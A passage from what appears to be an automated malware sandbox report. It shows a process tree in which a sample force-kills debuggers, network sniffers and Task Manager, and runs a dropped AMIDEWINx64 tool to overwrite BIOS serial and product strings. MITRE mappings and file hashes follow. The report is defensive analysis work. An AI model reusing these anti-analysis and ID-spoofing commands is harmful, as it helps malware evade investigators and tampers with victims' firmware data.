  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
  2⤵
  PID:1796
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
    3⤵
    - Executes dropped EXE
    PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BV " "
  2⤵
  PID:4652
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BV " "
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4200
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:4280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BS TWWQFIAN4SI40C
  2⤵
  PID:2676
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BS TWWQFIAN4SI40C
    3⤵
    - Executes dropped EXE
    PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:2796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
  2⤵
  PID:3136
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
    3⤵
    - Executes dropped EXE
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Kills process with taskkill
    PID:2264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
  2⤵
  PID:956
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
    3⤵
    - Executes dropped EXE
    PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
  2⤵
  PID:4044
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:5004
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
  2⤵
  PID:772
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2972
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CS XH5XQLRCR0
  2⤵
  PID:4972
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CS XH5XQLRCR0
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:4892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Kills process with taskkill
    PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
  2⤵
  PID:1092
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
    3⤵
    - Executes dropped EXE
    PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
  2⤵
  PID:3540
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3276
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
  2⤵
  PID:3832
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
  2⤵
  PID:2624
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
  2⤵
  PID:652
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3316
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:568
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:2256
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:2928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    - Kills process with taskkill
    PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3336
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3460
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:3212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:4684
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:340
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:3672
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    - Kills process with taskkill
    PID:4424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2348
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:2796
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3236
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:456
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:2932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:3328
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Kills process with taskkill
    PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:776
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:3900
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:3048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:4316

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\AMIDEWINx64.EXE

Filesize
455KB

MD5
9adfcdac59db3286690c7eede8da2528

SHA1
0b54d251438a634bd13b49a1f20587cf03d4598d

SHA256
13037eedd91f9313ec0d807947db65c639642e5ae6497e87d12fa6d19951f78e

SHA512
fde1700cdb4212593ec2733944a169c7d02f436ca6831719a33482fbfd0be289697c9aa6ce7ddfb6c245e87952b35416929bbf69753d21a24197ac6c2d1243cc

Download Submit
C:\Windows\System32\amifldrv64.sys

Filesize
29KB

MD5
f22740ba54a400fd2be7690bb204aa08

SHA1
5812387783d61c6ab5702213bb968590a18065e3

SHA256
65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9

SHA512
ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500

Download Submit
memory/3432-0-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-1-0x00007FFADB227000-0x00007FFADB229000-memory.dmp

Filesize
8KB

Download
memory/3432-2-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-3-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-5-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-4-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-6-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-34-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/3432-36-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download